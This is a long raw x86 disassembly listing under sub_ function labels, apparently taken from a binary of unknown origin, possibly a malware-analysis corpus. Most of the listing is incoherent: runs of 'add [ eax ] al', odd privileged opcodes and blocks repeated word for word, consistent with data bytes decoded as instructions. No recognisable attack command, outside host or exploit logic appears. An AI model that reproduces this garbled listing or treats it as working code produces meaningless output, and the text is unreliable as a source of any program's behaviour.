sub_40962c
pop esp
add [ eax ] al
add [ esi ] ah
add eax [ edi ]
or [ ebx + esi * 2 ] al
mov al 0x1
add [ esi ] al
or eax 0x6fe0908
mov cl 0x1
add [ esi ] al
jae r-xdata
add [ eax ] al
push ss
sub al [ ebx ]
sbb [ eax ] ch
0x0
add al [ eax ]
push es
sub [ ecx ] ch
add [ esi ] al
and [ edi ] al
add [ eax ] al
add dh bh
push cs
add eax 0x2d3800
sub_409fda
mov bh 0x28
push edi
add [ eax ] al
or ah [ eax ]
add [ eax ] al
add [ eax ] al
cmp dh bl
add [ eax ] al
add [ ecx ] dl
adc al 0x39
or [ eax ] eax
add [ eax ] al
adc [ edx ] edx
adc [ edx ] ebx
jge r-xdata
add [ ecx + edx ] al
adc edx esi
sahf
adc [ esi ] ecx
push es
jl r-xdata
add [ eax ] al
add al 0x11
push ss
pop ds
sub al 0x11
adc bh [ ebx + 0xc ]
add [ eax ] al
add al 0x11
push ds
add [ eax ] eax
push es
outsb
push ss
push 0x3b
push es
add [ eax ] al
add [ ebx - 0x23 ] dh
add [ eax ] al
or bh [ edx + 0x7 ]
cmp [ edx ] esp
add [ eax ] eax
add [ ecx ] dl
adc ah [ 0xf307fe ]
add [ esi ] al
jae r-xdata
add [ eax ] al
add al 0x7b
sbb al [ eax ]
add [ ecx + edx ] al
push ss
outsd
cmp [ es : ebx + 0x11fffffd ] bl
add eax 0xc1f1d11
salc
sub [ edi ] dl
add [ eax ] eax
or dl [ ebx ]
and [ ecx ] edx
add eax 0x101f1d11
salc
sub [ edi ] dl
add [ eax ] eax
or dl [ ebx ]
and [ ecx ] dl
add eax 0x141f1d11
salc
sub [ edi ] dl
add [ eax ] eax
or dl [ ebx ]
pop ds
cmp [ eax ] al
add [ eax ] al
or dh [ ebx - 0x4b ]
add [ eax ] al
or ch [ edi - 0x4a ]
add [ eax ] al
or ah [ eax ]
or al 0x0
add [ eax ] al
dec [ esi ]
daa
add [ eax ] bh
insd
add [ eax ] al
add [ ebx - 0x23 ] dh
add [ eax ] al
or bh [ edx + 0x11 ]
sbb [ eax ] ah
clc
add [ eax ] al
add dh dl
adc ebx [ 0x18110511 ]
sbb al 0xd6
sub [ eax ] bl
add [ eax ] eax
or dl [ ebx ]
sbb edx [ esi ]
adc ebx [ ecx ]
and [ ecx ] al
add [ eax ] al
add [ eax ] ch
0x39060000 0x42
sub_4139f3
push es
add [ eax ] al
add dh bh
push cs
cmp al [ eax ]
dec [ edx + edi ]
add [ ebp + 0x8 ] al
add [ eax ] al
add [ eax ] bh
add [ eax ] al
add [ edx + 0xefffff4 ] bl
add [ eax ] al
add [ ecx + 0x4efffff4 ] al
hlt
sub_4142c0
push es
add bh [ ebx - 0x20 ]
add [ eax ] al
add al 0x72
pop esi
sub al 0x0
jo r-xdata
add [ eax ] al
add al 0x6f
mov eax [ ecx ]
add [ edx ] cl
adc ecx [ ecx ]
adc cl [ ecx ]
sub [ eax + 0x6f0a0001 ] al
mov edx 0xdd0a0000
sldt [ eax ]
jpo r-xdata
add [ eax ] al
add [ eax ] bh
scasd [ edi ]
add [ eax ] eax
add [ ebx ] al
jpo r-xdata
or ah [ eax ]
pop es
add [ eax ] al
add al 0x1f
outsd
enter 0x1 0xa
or ah [ eax ]
add [ eax ] al
add [ eax ] al
dec [ esi ]
or eax [ eax ]
cmp [ edi + 0x11000001 ] cl
jbe r-xdata
add eax 0x698e0411
add [ eax ] al
add al 0x3
jpo r-xdata
adc ecx [ eax ]
add dh [ edx - 0xe ]
xor [ eax ] al
jo r-xdata
add [ esi ] al
aas
inc ebx
add [ eax ] al
add [ ebx ] al
jpo r-xdata
add [ eax ] al
add [ ecx ] dl
or [ ecx ] bh
pop es
add [ eax ] al
add [ ecx ] dl
or [ edi - 0x42 ] ch
add [ eax ] al
or bl ah
add bh [ ebx - 0x1f ]
add [ eax ] al
add al 0x3
outsd
mov al [ ecx ]
add [ edx ] cl
and [ edi ] al
fisttp [ edi ]
add [ eax ] al
retn 0x1
add al 0x6f
leave
add [ eax ] eax
or al [ ebx ]
jpo r-xdata
add [ eax ] al
add [ eax ] al
add al 0x73
fild [ ecx ]
add [ esi ] al
adc [ ecx ] al
and [ edx ] al
add [ eax ] al
add [ esi ] dl
cmp [ edi + 0x1 ] ebx
add [ eax ] al
push es
adc eax [ esi + edx ]
adc eax [ 0x520 ]
add dh bh
push cs
or eax [ eax ]
cmp [ esi + 0x1 ] al
add [ eax ] al
cmp [ edx + 0x11ffffff ] dh
add al 0x11
add eax 0x6f070b9a
0x1
sub_414839
push es
add [ eax ] al
add [ eax ] bh
pop ds
add [ eax ] al
add [ edi ] al
add ebp [ eax ]
outsb
add [ eax ] eax
or dh [ esp + ebx * 2 ]
add [ ecx ] al
or al 0x38
iretd
sub_4188f4
fst [ edi ]
add [ eax ] al
add [ eax ] cl
jne r-xdata
pop edi
add [ eax ] eax
or ah [ esi ]
and [ esi ] al
add [ eax ] al
add dh bh
push cs
add al 0x0
cmp ah al
add [ eax ] al
add [ edx ] al
jpo r-xdata
add [ eax ] al
add [ ebx ] edx
add eax 0x7390511
add [ eax ] al
add [ ecx ] dl
add eax 0xbe6f
or bl ah
sub al [ eax ]
add [ eax ] al
add [ eax + eax ] ebx
add [ edx ] al
add dh bh
add [ eax + 0x6e ] dh
add [ edi ] edx
add [ eax ] al
add [ eax ] al
add al [ eax ]
iretd
add [ eax ] al
add al 0x6f
0x380a0000 0xff8c
add [ eax ] eax
add al 0x6
outsd
adc eax [ eax ]
add [ edx ] cl
add ch [ eax ]
cwde
add [ eax ] al
push es
outsd
0x20a0000 0x7b7b
add [ eax ] eax
add al 0x6f
add al [ cs : eax ]
or bl [ edi ]
cmp al 0x58
or eax [ edi ]
add ch [ eax ]
das
add al [ eax ]
or cl [ edx + edx ]
add ch [ eax ]
cmc
add [ eax ] al
or bh [ esi ]
or [ ecx ] al
add [ eax ] al
add al [ edx ]
sub [ edi ] ch
add al [ eax ]
or cl [ 0xffffffffee280312 ]
add [ eax ] eax
or al [ edi ]
jae r-xdata
add [ eax ] al
add al 0x6f
bound eax [ eax ]
add [ edx ] cl
outsd
add [ eax ] al
or ch [ eax ]
lodsb [ esi ]
add [ eax ] al
or ah [ eax ]
or [ eax ] al
add [ eax ] al
sub [ edi + 0x3a060002 ] dl
add [ gs : eax ] al
add [ esi ] ah
add edi [ ebx - 0x3 ]
add [ eax ] al
add al 0x6f
ja r-xdata
add [ edx ] cl
push ss
push ss
add [ eax ] al
add [ edx ] al
jpo r-xdata
add [ eax ] al
add dh bh
push cs
add al 0x0
cmp ch al
add [ eax ] eax
add al 0x3
jpo r-xdata
add edi [ ebx - 0x3 ]
sub_418927
add dh al
xchg ebp eax
add [ edi ] edx
add [ eax ] al
add [ eax ] al
adc esi [ eax ]
add al 0x0
jge r-xdata
add [ edx + 0x20110000 ] dl
add eax 0xfe000000
push cs
add al 0x0
cmp al dh
add [ eax ] al
add [ esi ] al
jb r-xdata
add [ eax ] al
xchg edx eax
add [ eax ] al
adc [ eax ] esp
cmp [ eax ] al
jo r-xdata
jae r-xdata
pop edi
add [ eax ] eax
or ah [ esi ]
push es
add edi [ ebx - 0x4 ]
add [ eax ] al
add al 0x6f
bound eax [ eax ]
add [ edx ] cl
outsd
pop edi
add [ eax ] eax
or ah [ esi ]
and [ esi ] al
add [ eax ] al
add dh bh
push cs
add al 0x0
cmp ah al
add [ eax ] al
add [ edx ] al
jpo r-xdata
add [ eax ] al
or ch [ eax ]
lodsb [ esi ]
add [ eax ] al
or ah [ eax ]
or [ eax ] al
add [ eax ] al
sub [ edi + 0x3a060002 ] dl
add [ gs : eax ] al
add [ esi ] ah
add edi [ ebx - 0x3 ]
add [ eax ] al
add al 0x6f
ja r-xdata
add [ eax ] al
add al 0x6f
0x380a0000 0xff8c
add [ eax ] eax
add al 0x6
outsd
adc eax [ eax ]
add [ edx ] cl
add ch [ eax ]
cwde
add [ eax ] al
push es
outsd
0x20a0000 0x7b7b
add [ eax ] eax
add al 0x6f
add al [ cs : eax ]
or bl [ edi ]
cmp al 0x58
or eax [ edi ]
add ch [ eax ]
das
add al [ eax ]
or cl [ edx + edx ]
add ch [ eax ]
cmc
add [ eax ] al
or bh [ esi ]
or [ ecx ] al
add [ eax ] al
add al [ edx ]
sub [ edi ] ch
add al [ eax ]
or cl [ 0xffffffffee280312 ]
add [ eax ] eax
or al [ edi ]
add [ edx ] cl
push ss
push ss
add [ eax ] al
add [ edx ] al
jpo r-xdata
add [ eax ] al
add dh bh
push cs
add al 0x0
cmp ch al
add [ eax ] eax
add al 0x3
jpo r-xdata
add edi [ ebx - 0x3 ]
sub_41ce6d
or al [ eax ]
add [ ebx ] al
add [ edx + ebx ] bl
add [ ecx ] al
add al dl
or eax 0x10000
mov [ 0x200001a ] eax
add [ edi + 0x100001a ] ah
add [ edi + 0x200001a ] ch
add [ ebx + 0x100001a ] dh
add [ ecx ] al
or eax [ eax ]
add [ edx ] al
add ch bl
sbb al [ eax ]
add [ ebx ] al
add cl ah
sbb al [ eax ]
add [ eax + eax ] al
in eax 0x1a
add [ eax ] al
add eax 0x13c400
add [ ecx ] al
add [ edi ] bl
push ss
add [ eax ] al
add al [ eax ]
mov [ eax + eax ] cs
add [ ebx ] al
add [ edx ] dh
adc eax 0x10000
pop ds
push ss
add [ eax ] al
add [ eax ] eax
jg r-xdata
add [ eax ] al
add eax [ eax ]
stc
or al [ eax ]
add [ ecx ] al
add [ 0x100001b ] al
add [ edi + 0x12 ] bh
add [ eax ] al
add [ eax ] eax
jo r-xdata
add [ eax ] al
add [ eax ] eax
stc
sbb al [ eax ]
add [ ecx ] al
add [ edi ] bh
or al [ eax ]
add [ edx ] al
add ch dh
or al [ eax ]
add [ ebx ] al
add cl bh
add [ ebx ] al
add [ ebx + 0x12 ] ah
add [ eax ] al
add al 0x0
adc al [ bx + si ]
add [ 0x126b00 ] al
add [ ecx ] al
add [ ecx ] bl
sbb eax [ eax ]
add [ edx ] al
add [ 0x100001b ] bl
add [ ebx ] cl
or al [ eax ]
add [ ecx ] al
add [ 0x100001b ] ah
add al cl
or eax 0x20000
jle r-xdata
add [ eax ] al
add al [ eax ]
pop edi
adc al [ eax ]
add [ ecx ] al
add bh ch
sbb [ eax ] al
add [ edx ] al
add bl dh
sbb [ eax ] al
add [ ebx ] al
add bh dh
sbb [ eax ] al
add [ eax + eax ] al
sti
sbb [ eax ] al
add [ ecx ] al
add [ eax + 0x7 ] dh
add [ eax ] al
add al [ eax ]
pop edi
adc al [ eax ]
add [ ebx ] al
add [ ebx + 0x12 ] ah
add [ eax ] al
add al 0x0
adc al [ bx + si ]
add [ 0x126b00 ] al
add [ esi ] al
add [ edi + 0x12 ] ch
add [ eax ] al
pop es
add [ ebx + 0x12 ] dh
add [ eax ] al
add [ eax ] eax
jo r-xdata
add [ eax ] al
add [ eax ] eax
mov ah 0x1b
add [ eax ] al
add al [ eax ]
mov eax 0x100001b
add [ ebx ] al
add [ ebx + 0x12 ] ah
add [ eax ] al
add al 0x0
adc al [ bx + si ]
add [ 0x126b00 ] al
add [ esi ] al
add [ edi + 0x12 ] ch
add [ eax ] al
pop es
add [ ebx + 0x12 ] dh
add [ eax ] al
or [ eax ] al
ja r-xdata
add [ eax ] al
add al [ eax ]
pop edi
adc al [ eax ]
add [ eax ] ah
add [ eax ] al
mov ch 0x1
add [ eax ] al
add [ eax ] eax
mov eax [ 0x100000a ]
add [ edi ] cl
push ss
add [ eax ] al
add [ eax ] eax
pop edi
sbb al 0x0
add [ edx ] al
add [ edi + eax ] dh
add [ ecx ] al
add [ ecx + 0x200000a ] ah
add [ edi + 0x12 ] bh
add [ eax ] al
add [ eax ] eax
pop ds
sbb eax 0x20000
cmc
or al [ eax ]
add [ ebx ] al
add [ esi + 0xd ] bh
add [ eax ] al
add [ eax ] eax
mov eax [ 0x200000a ]
add al ah
sldt [ eax ]
add [ eax ] eax
das
sbb eax 0x10000
jo r-xdata
add [ eax ] al
or [ eax ] eax
ficomp [ ecx ]
add [ eax ] al
add [ eax ] eax
inc eax
sbb al 0x0
add [ ecx ] al
add [ ecx + 0x20000a ] ah
add [ ebp + 0x1000001 ] dh
add [ ecx + 0x100000a ] ah
add [ ecx ] al
add [ edi + 0x100001d ] bl
add [ eax + 0x7 ] dh
add [ eax ] al
add al [ eax ]
pop edi
adc al [ eax ]
add [ ebx ] al
add [ ebx + 0x12 ] ah
add [ eax ] al
add al 0x0
adc al [ bx + si ]
add [ 0x126b00 ] al
add [ esi ] al
add [ edi + 0x12 ] ch
add [ eax ] al
pop es
add [ ebx + 0x12 ] dh
add [ eax ] al
or [ eax ] al
ja r-xdata
add [ eax ] al
add al [ eax ]
pop edi
adc al [ eax ]
add [ eax ] al
add al [ eax ]
cmc
or al [ eax ]
add [ ebx ] al
add [ esi + 0xd ] bh
add [ eax ] al
add [ eax ] eax
loope r-xdata
add [ eax ] al
or [ eax ] eax
ficomp [ ecx ]
add [ eax ] al
or al [ eax ]
ficomp [ ecx ]
add [ eax ] al
add [ eax ] eax
mov bl 0x1d
push ds
add [ eax ] eax
add [ eax ] eax
dec edx
push ds
add [ eax ] al
add al [ eax ]
arpl [ esi ] bx
add [ eax ] al
add eax [ eax ]
je r-xdata
add [ eax ] al
add al [ eax ]
in eax 0x1d
add [ eax ] al
add [ eax ] eax
mov eax [ 0x200000a ]
add [ ebx ] dl
push ds
add [ eax ] al
add [ eax ] eax
pop ss
push ds
add [ eax ] al
add al [ eax ]
and al 0x1e
add [ eax ] al
add al [ eax ]
lds esp [ eax ]
add [ eax ] al
add eax [ eax ]
int3
add [ eax ] al
add [ eax ] eax
xchg ecx eax
push ds
add [ eax ] eax
add [ eax ] eax
dec edx
push ds
add [ eax ] al
add [ eax ] eax
pop ss
push ds
add [ eax ] al
add al [ eax ]
and al 0x1e
add [ eax ] al
add [ eax ] eax
mov ebx 0x2000020
add ch al
and [ eax ] al
add [ ebx ] al
add ah cl
and [ edx ] al
add [ eax + eax ] al
fldenv [ eax ]
add [ eax ] al
add eax 0x1e6300
add [ esi ] al
add [ esi + ebx + 0x2 ] dh
add [ ecx ] al
add cl bl
and [ eax ] al
add [ edx ] al
add [ ecx + 0x100001e ] dl
add [ ebx + 0x2000020 ] bh
add ch al
and [ eax ] al
add [ ebx ] al
add ah cl
and [ edx ] al
add [ eax + eax ] al
fldenv [ eax ]
add [ eax ] al
add [ eax ] eax
pop ss
push ds
add [ eax ] al
add al [ eax ]
and al 0x1e
add [ eax ] al
add [ eax ] eax
call 0x241d13d
add cl dh
and [ eax ] al
add [ ebx ] al
add bl bh
and [ eax ] al
add [ eax + eax ] al
int3
sub_41dde5
push cs
test [ 0xee00131 ] eax
mov [ 0xeea0211 ] es
xchg ebx eax
add eax 0xef30074
0xfc026905 0x550e
add eax 0xf2f00c9
add ecx ecx
add [ edi ] dh
rsm
add eax 0xf600291
popad
push es
cdq
add bl [ ebx ]
inc edx
add edx [ ecx + 0x670f9102 ]
push es
mov eax [ 0x42005b02 ]
add eax [ ecx + 0x1 ]
les ecx [ edi ]
outsb
push es
popad
add ah ah
sub_41e08c
xchg [ edx ] cl
fld [ edx ]
push ss
sub eax 0x5b021901
add [ esp + eax ] ch
or [ ecx ] eax
push cs
pop ss
mov ecx 0x2101090a
pop ss
jno r-xdata
or ch cl
add [ esi ] esi
pop ss
aam 0xa
test [ eax ] al
mov [ 0xffffffff8405640e ] eax
add [ edi - 0x73fa95f2 ] ch
add [ edi + edx + 0x2d ] bl
add [ eax + eax + 0x59a110c ] eax
mov [ eax ] es
or al 0x11
xor al [ edx ]
cmp [ eax ] eax
pop ss
dec ecx
add [ ecx ] edx
add dh [ esi + 0x17 ]
sbb [ ecx + ecx ] al
add al 0x5b
add [ eax ] cl
cmp [ eax ] eax
popfd
pop ss
retn
dec ecx
add esp [ edi + 0x13 ]
ror [ edx ] 0xe9
sub_41e14d
or al 0x59
add [ eax + ebx + 0x441029d ] ebx
push eax
push cs
push ecx
or al 0x41
add al 0x36
pop ss
push edi
or al 0x41
add al 0xba
sbb [ esi + 0xc ] bl
cmp [ eax ] eax
retn 0xe918
sub_41e28b
setl [ eax ]
cli
sbb al 0xf1
shld [ eax ] eax 0xc
adc [ edx + 0x74036105 ] ebx
sbb eax 0x4f91054
pop ebx
add [ edx + 0x10 ] bl
stc
add al 0x86
sbb eax 0x1311062
enter 0x6709 0x10
adc [ ecx ] eax
nop
sbb eax 0x369008d
mov esp 0x39012813
add al 0xe9
sbb eax 0x15910b9
mov eax 0x3910f51e
add al 0x89
pop ds
or edx [ edx ]
cmp [ eax + ecx * 8 ] eax
or [ eax ] edx
adc bh [ ecx ]
add al 0x96
pop ds
sbb [ edx ] edx
cmp [ 0x5112201f ] eax
add bh bl
and ah [ ebp + 0x14 ]
fld [ eax ]
out dx eax
and ch [ ebx + 0x14 ]
and [ 0x14982345 ] eax
add [ eax ] 0x29005b
or [ ecx ] eax
retn 0xd823
sub_41e55f
push cs
fcomp [ eax ]
cdq
add [ ebp + ebp + 0x199012d ] ebp
mov ch 0x2d
in al 0x18
xor [ 0x18e92430 ] eax
cdq
add [ esi + 0xe ] ebp
sub eax 0xe2019901
or dh al
sbb cl bl
add bh al
sub eax 0xd91910
fisubr [ 0x5510136 ]
jmp r-xdata
add eax 0x1a41324f
leave
add eax 0x1a490ae2
leave
add eax 0x7d43258
mov eax [ 0x6432cb00 ]
sbb ch [ ecx + 0x6432dd00 ]
sbb ah [ ecx + 0x6432ea00 ]
sbb ch cl
add [ esi ] esi
pop ss
jpo r-xdata
mov [ ebx ] esi
push ds
movaps [ edx ] xmm0
xchg esi eax
xor ecx [ ebp - 0x3ffa0ee6 ]
xor esp [ edx + 0x5b00a902 ]
add [ ecx ] ch
add [ ecx + 0x1 ] dh
iretd
test eax 0x2d16f300
add [ ecx - 0x60ccb200 ] ebp
add al 0xa9
add [ ebx + esi - 0x80 ] ah
sbb ch [ ecx - 0x79cc7f00 ]
sbb ch cl
add eax 0xf1e3389
sub [ edx ] eax
sub_41e590
mov [ 0xfffffffff9055102 ] al
sub eax 0x5a902a2
pop ebx
add [ eax ] cl
jns r-xdata
imul eax [ edx ] 0xffffffa9
add eax 0x5710e6e
xor [ ecx ] eax
xchg [ esi ] ch
insb
sbb [ ecx + 0x29005b00 ] ebx
add cl bh
add [ ebx ] bl
dec eax
add cl cl
add eax 0x1a41324f
leave
add eax 0x1a490ae2
leave
add eax 0x7d43258
mov eax [ 0x6432cb00 ]
sbb ch [ ecx + 0x6432dd00 ]
sbb ah [ ecx + 0x6432ea00 ]
sbb ch cl
add [ esi ] esi
pop ss
jpo r-xdata
jpe r-xdata
mov [ ebx ] esi
push ds
movaps [ edx ] xmm0
xchg esi eax
xor ecx [ ebp - 0x3ffa0ee6 ]
xor esp [ edx + 0x5b00a902 ]
add [ ecx ] ch
add [ ecx + 0x1 ] dh
iretd
test eax 0x2d16f300
add [ ecx - 0x60ccb200 ] ebp
add al 0xa9
add [ ebx + esi - 0x80 ] ah
sbb ch [ ecx - 0x79cc7f00 ]
sbb ch cl
add eax 0xf1e3389
sub [ edx ] eax

sub_41e81f
push ds
int1
push es
pop ebx
add [ ebp + 0x5b06f902 ] bl
add [ ecx ] ch
add [ ecx ] al
pop es
pop ebx
add [ ecx ] ch
add [ ecx ] cl
pop es
pop ebx
add [ ecx ] ch
add [ ecx ] dl
pop es
pop ebx
add [ ecx ] ch
add [ ecx ] bl
pop es
pop ebx
add [ ecx ] ch
add [ ecx ] ah
pop es
pop ebx
add [ eax ] cl
sub [ edi ] eax
pop ebx
add [ edi + ebx ] al
cmp [ edi ] eax
pop ebx
add [ eax ] cl
inc ecx
pop es
pop ebx
add [ ecx ] ch
add [ ecx + 0x7 ] cl
pop ebx
add [ eax ] cl
push ecx
pop es
pop ebx
add [ ebp + 0x5b075902 ] bl
add [ edi + 0x5b07691f ] bh
add [ ecx ] ch
add [ ecx + 0x7 ] dh
pop ebx
add [ eax ] cl
jns r-xdata
add bh bh
adc [ eax ] cl
add [ eax + eax + 0x4 ] al
adc [ eax ] ecx
add [ eax ] cl
or [ ecx ] edx
or [ eax ] al
dec esp
add [ esi ] cl
adc [ eax ] ecx
add [ eax ] dl
adc edx [ ecx ]
or [ eax ] al
push esp
add [ eax ] bl
adc [ eax ] ecx
add [ eax ] bl
sbb eax 0x5c000811
add [ edx ] ah
adc [ eax ] ecx
add [ eax ] ah
daa
adc [ eax ] ecx
add [ eax + eax + 0x8125b ] ch
mov al 0x0
add al 0x11
or [ eax ] al
mov ah 0x0
call [ eax ]
or [ eax ] al
mov eax 0x8126000
add [ eax + eax + 0x81265 ] bh
rol [ eax ] 0x6a
adc cl [ eax ]
add ah al
add [ ecx ] cl
adc [ eax ] ecx
add al cl
add [ edi + 0x12 ] ch
or [ eax ] al
int3
pop ebx
add [ ecx ] ch
add [ eax ] cl
add [ eax ] al
call [ eax ]
or [ eax ] al
inc esp
add [ ecx + edx ] al
or [ eax ] al
dec eax
add [ ecx ] cl
adc [ eax ] ecx
add [ eax + eax + 0xe ] cl
sub_41eaad
push ds
add eax [ ebx ]
rcl [ ecx ] cl
call [ eax ]
and eax [ ebx ]
mov [ 0x4010ff11 ] eax
add ebx ebx
adc edi edi
adc [ ebx + 0x3 ] al
jecxz r-xdata
adc [ esi ] esi
sbb eax 0x119b0440
call [ eax ]
pushad
add al 0x9b
call [ eax ]
jecxz r-xdata
adc edi edi
adc [ ecx + 0x36122307 ] cl
sbb eax 0x121b0789
mov ecx 0xab07a31f
adc edi edi
adc [ ebx - 0xee14f9 ] ah
adc [ ebx - 0xee2cf9 ] ah
adc [ ebx - 0xee5cf9 ] ah
adc bl al
pop es
mov [ 0xffffffffc910ff11 ] eax
pop es
sbb edx [ edx ]
mov ecx 0x2307c91f
adc dh [ esi ]
sbb eax 0x11f307e3
leave
push ds
jecxz r-xdata
adc [ eax ] al
add al 0x9b
jecxz r-xdata
adc ebx edi
push ds
inc ebx
or ebx edi
adc [ ebx ] ecx
pop ds
jecxz r-xdata
rcl [ ecx ] cl
call [ eax ]
arpl [ eax ] cx
sti
adc edi edi
adc [ eax - 0xee64fc ] al
adc [ eax - 0xee64fc ] ah
adc [ eax ] al
add eax 0x10ff119b
add [ 0x1d36118b ] al
and [ 0x1d36118b ] al
and [ 0x10ff119b ] al
inc eax
add eax 0x1d36118b
inc eax
add eax 0x10ff119b
pushad
add eax 0x1d36118b
pushad
add eax 0x10ff119b
add [ 0x10ff119b ] 0xa0
add eax 0x10ff119b
rol [ 0x1d36118b ] 0xc0
add eax 0x10ff119b
and [ esi ] al
fwait
adc edi edi
adc [ ecx ] ch
push es
add edx [ edx ]
das
pop ds
inc eax
push es
mov edx [ ecx ]
sbb eax 0x119b0640
call [ eax ]
arpl [ edi ] ax
mov [ 0x6310ff11 ] eax
pop es
stosd [ edi ]
adc edi edi
adc [ ebx + 0x7 ] ah
rcl [ ecx ] cl
call [ eax ]
arpl [ edi ] ax
xchg ebx eax
adc [ esi + ebx ] edx
arpl [ edi ] ax
jmp r-xdata
adc edi edi
adc [ eax + 0x4 ] ah
fwait
adc edi edi
adc [ eax ] al
add al 0x8b
call [ eax ]
add [ ebx + ebx * 4 ] al
jecxz r-xdata
rcl [ ecx ] cl
call [ eax ]
retn
or al 0xfb
adc [ esi ] esp
pop ds
jecxz r-xdata
sti
adc [ 0xfffffffffb0c031f ] ebx
adc [ esi ] esp
pop ds
and ecx [ ebx + edi * 8 ]
adc ch [ edi + 0x130f631f ]
adc ch [ edi + 0x130fa31f ]
adc ch [ edi + 0x130fc31f ]
adc ch [ edi + 0x2b10031f ]
adc al dh
pop ds
and edx [ eax ]
sub edx [ edx ]
js r-xdata
sti
adc [ esi + 0x130f231f ] esp
adc ch [ edi + 0x130f431f ]
xor edx [ edx ]
fldenv [ eax ]
add al 0x52
cmp edx [ edx ]
pop ds
and [ edx ] eax
xor edx [ ecx ]
push edx
add [ edx ] bh
adc [ ebx ] edi
push edx
pop es
add [ eax ] 0x8b
adc cl [ edx - 0x20ed7100 ]
add [ ecx + 0x4c02820f ] ebx
sbb al 0x2
add [ ebp + 0x1 ] dl
les eax [ 0x1 ]
add [ eax ] al
sbb eax [ eax ]
add [ eax ] eax
add [ eax ] al
add [ eax ] al
sbb al 0x0
add [ eax ] eax
adc [ eax ] al
add [ eax ] al
pop eax
add [ ecx ] al
add [ eax ] al
add al 0x0
add [ ecx ] bl
add [ eax ] eax
je r-xdata
add edx [ ecx ]
rcl [ ecx ] cl
call [ eax ]
pushad
push ds
rcl [ ecx ] cl
call [ eax ]
sbb [ esi ] 0xd3
adc edi edi
adc al al
inc ecx
or edx [ edx ]
call [ eax ]
ror [ ebx + 0x33 ] 0x12
sub esp [ eax ]
pushad
dec esp
add [ eax ] al
pop edx
add [ ecx ] al
add [ eax ] bh
add [ eax ] al
pop ebx
add [ ecx ] al
add [ eax + eax ] cl
add [ eax ] al
pop esp
add [ ecx ] al
add [ eax + eax ] cl
add [ ebp ] bl
add [ eax ] eax
jl r-xdata
add [ eax ] al
mov [ eax ] eax
add [ eax ] eax
je r-xdata
add [ eax ] al
mov al [ eax ]
mov cl 0x0
salc
add bh ah
add bl dh
add bh bh
add [ ebx ] ah
add [ ecx ] esi
add [ ebx ] edi
add [ ebp + 0x1 ] ecx
pop edx
add [ edi + 0x1 ] esi
add [ ecx ] 0x9b
add ebx esp
add edi ebp
add ebx edi
add [ ecx ] ebx
add al [ esi + 0x2 ]
and al 0x3
dec eax
add edx [ ebp + 0x3 ]
imul eax [ ebx ] 0xffffff91
add esp [ ecx + 0xe040103 ]
add al 0x47
add al 0x6a
add al 0x8b
add al 0xd4
add al 0xf4
add al 0x84
push es
adc [ edi ] eax
and eax [ edi ]
inc ebp
pop es
jne r-xdata
pop es
or al 0x8
push ss
or [ ebx + 0x8 ] al
jpe r-xdata
add [ edi ] 0xa5
pop es
retn
sub al 0x9
push ebp
or [ ebp + 0x209e709 ] esi
or dh [ ebp + 0xa ]
xchg esi eax
or ch [ eax - 0x12f551f6 ]
or cl [ ebx ]
or ecx [ ecx + 0xb ]
push esi
or edi [ edx + 0xb ]
mov [ ebx ] ecx
0x6d0bd40b 0x740c
or al 0xb1
or al 0xc1
or al 0x3c
or eax 0xd6d0d58
mov al [ 0xffffffffbd0da60d ]
or eax 0xdff0dc4
push ds
push cs
push esp
push cs
ja r-xdata
xchg esi eax
or [ edi - 0x7f736f8 ] ch
or [ ecx + ecx ] ch
test [ edi ] cl
cmpsb [ esi ] [ edi ]
push cs
mov ebp 0xee0ede0e
push cs
adc [ edi ] ecx
packsswb mmx1 [ ss : edi ]
sub_41eb6c
call [ eax ]
add [ edi ] 0xffffff93
adc [ esi + 0x1e ] ebx
add [ edi ] 0xffffff8b
adc [ ebp + 0x1e ] edx
add [ edi ] 0xffffffd3
adc edi edi
adc [ ecx + 0x36122307 ] cl
sbb eax 0x121b0789
mov ecx 0xab07a31f
adc edi edi
adc [ ebx - 0xee14f9 ] ah
adc [ ebx - 0xee2cf9 ] ah
adc [ ebx - 0xee5cf9 ] ah
adc bl al
pop es
mov [ 0xffffffffc910ff11 ] eax
pop es
sbb edx [ edx ]
mov ecx 0x2307c91f
adc dh [ esi ]
sbb eax 0x11f307e3
leave
push ds
jecxz r-xdata
adc ebx edi
push ds
inc ebx
or ebx edi
adc [ ebx ] ecx
pop ds
jecxz r-xdata
rcl [ ecx ] cl
call [ eax ]
arpl [ eax ] cx
sti
jecxz r-xdata
rcl [ ecx ] cl
call [ eax ]
retn
or al 0xfb
adc [ esi ] esp
pop ds
jecxz r-xdata
sti
adc [ 0xfffffffffb0c031f ] ebx
adc [ esi ] esp
pop ds
and ecx [ ebx + edi * 8 ]
adc ch [ edi + 0x130f631f ]
adc ch [ edi + 0x130fa31f ]
adc ch [ edi + 0x130fc31f ]
adc ch [ edi + 0x2b10031f ]
adc al dh
pop ds
and edx [ eax ]
sub edx [ edx ]
js r-xdata
sti
adc [ esi + 0x130f231f ] esp
adc ch [ edi + 0x130f431f ]
xor edx [ edx ]
fldenv [ eax ]
add al 0x52
cmp edx [ edx ]
pop ds
and [ edx ] eax
xor edx [ ecx ]
push edx
add [ edx ] bh
adc [ ebx ] edi
push edx
pop es
add [ eax ] 0x8b
adc cl [ edx - 0x20ed7100 ]
add [ ecx + 0x4c02820f ] ebx
sbb al 0x2
add [ ebp + 0x1 ] dl
les eax [ 0x1 ]
add [ eax ] al
sbb eax [ eax ]
add [ eax ] eax
add [ eax ] al
add [ eax ] al
sbb al 0x0
add [ eax ] eax
adc [ eax ] al
add [ eax ] al
pop eax
add [ ecx ] al
add [ eax ] al
add al 0x0
add [ ecx ] bl
add [ eax ] eax
je r-xdata
add edx [ ecx ]
rcl [ ecx ] cl
call [ eax ]
pushad
push ds
rcl [ ecx ] cl
call [ eax ]
sbb [ esi ] 0xd3
adc edi edi
adc al al
inc ecx
or edx [ edx ]
call [ eax ]
ror [ ebx + 0x33 ] 0x12
sub esp [ eax ]
pushad
dec esp
add [ eax ] al
pop edx
add [ ecx ] al
add [ eax ] bh
add [ eax ] al
pop ebx
add [ ecx ] al
add [ eax + eax ] cl
add [ eax ] al
pop esp
add [ ecx ] al
add [ eax + eax ] cl
add [ ebp ] bl
add [ eax ] eax
jl r-xdata
add [ eax ] al
mov [ eax ] eax
add [ eax ] eax
je r-xdata
add [ eax ] al
mov al [ eax ]
mov cl 0x0
salc
add bh ah
add bl dh
add bh bh
add [ ebx ] ah
add [ ecx ] esi
add [ ebx ] edi
add [ ebp + 0x1 ] ecx
pop edx
add [ edi + 0x1 ] esi
add [ ecx ] 0x9b
add ebx esp
add edi ebp
add ebx edi
add [ ecx ] ebx
add al [ esi + 0x2 ]
